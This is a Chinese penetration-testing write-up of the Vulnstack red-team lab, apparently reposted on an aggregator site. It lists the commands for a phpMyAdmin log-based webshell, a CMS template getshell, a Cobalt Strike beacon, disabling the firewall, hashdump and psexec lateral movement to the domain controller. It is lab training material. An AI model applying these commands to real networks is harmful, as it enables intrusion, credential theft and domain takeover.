IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> [渗透测试]Vulnstack 红队(一) -> 正文阅读

[PHP知识库][渗透测试]Vulnstack 红队(一)

官方描述

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019

域环境初始化

攻击机:
kali ip:192.168.111.5

靶机:

win7 外网ip:192.168.111.6  内网ip:192.168.52.143

win03 ip: 192.168.52.141

win08 ip: 192.168.52.138

最后,在win7上使用phpstudy开启web服务。

渗透测试

信息搜集

nmap扫一下

nmap -sS 192.168.111.6

**-sS :**半开放扫描,Nmap发送SYN包到远程主机,但是它不会产生任何会话,目标主机几乎不会把连接记入系统日志。(防止对方判断为扫描攻击),扫描速度快,效率高,在工作中使用频率最高

image-20220207213054322

访问80端口,是一个php探针

image-20220207213944517

dirsearch扫一下,发现了phpmyadmin

image-20220207214939137

访问:

image-20220207215300223

通过扫描备份目录可以发现beifen.rar,打开是yxcms的源码,猜测网站搭建了yxcms网站。访问/yxcms

image-20220207215329285

外网渗透

有两种获取shell的方式

phpMyAdmin

弱口令root/root登录

phpmyadmin页面getshell方式有两种:

  1. into_outfile写shell

条件:需要secure_file_priv为允许

查询SHOW VARIABLES LIKE "%SECURE%"

image-20220207220644481

配置未开启,这个方法不行

  1. 日志备份获取shell

SHOW VARIABLES LIKE "%general%"查询general_log配置

发现未开启

set global general_log='on'开启general log模式

SET global general_log_file='C:/phpStudy/WWW/shell.php' 设置日志文件保存路径

SELECT '<?php @eval($_POST[1]);?>' 写入日志文件

蚁剑连接

image-20220207221806919

Yxcms

image-20220208000505484

访问后台,通过修改模板getshell

image-20220208000844687

蚁剑连接即可

内网信息搜集

CS上线

创建一个监听器

image-20220207223008640

制作一个马

image-20220207223101317

将exe文件用蚁剑上传并运行

image-20220207223309418

上线成功,执行sleep 1

信息搜集

shell whoami

god\administrator

shell ipconfig

发现两个网段,一个内网一个外网

192.168.111.6
192.168.52.143

shell hostname 查看主机名

stu1

查看当前登录域和用户信息

shell net config Workstation

image-20220207224558471

查看域控

shell net group "domain controllers" /domain
这项请求将在域 god.org 的域控制器处理。
组名     Domain Controllers
注释     域中所有域控制器
成员
-------------------------------------------------------------------------------
OWA$                     

查看域管

shell net group "domain admins" /domain
这项请求将在域 god.org 的域控制器处理。
组名     Domain Admins
注释     指定的域管理员
成员
-------------------------------------------------------------------------------
Administrator            OWA$       

查看域成员

shell net view /domain:god

image-20220207230659503

提权

使用CS提升当前权限为system

image-20220207232313088

image-20220207232339581

获得system反弹shell

image-20220207232424701

查看防火墙状态

shell netsh firewall show state

发现开启,关闭防火墙

shell netsh advfirewall set allprofiles state off

横向移动,获取域控

查看域内计算机

net view

查看域控列表

net dclist

抓取凭证

hashdump

获取明文

image-20220207233300877

SMB Beacon

创建监听

image-20220207234024388

使用之前获取的主机信息和凭据,使用psexec模块进行登入。

image-20220207235639931

image-20220207235717971

拿下OWA域控

image-20220207235807373

接下来以同样方式控制最后一台机器,需要把session更改为OWA的

image-20220208000043451

参考文章:

https://y4tacker.blog.csdn.net/article/details/121764343

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-09 20:28:51  更:2022-02-09 20:29:03 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 11:39:23-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码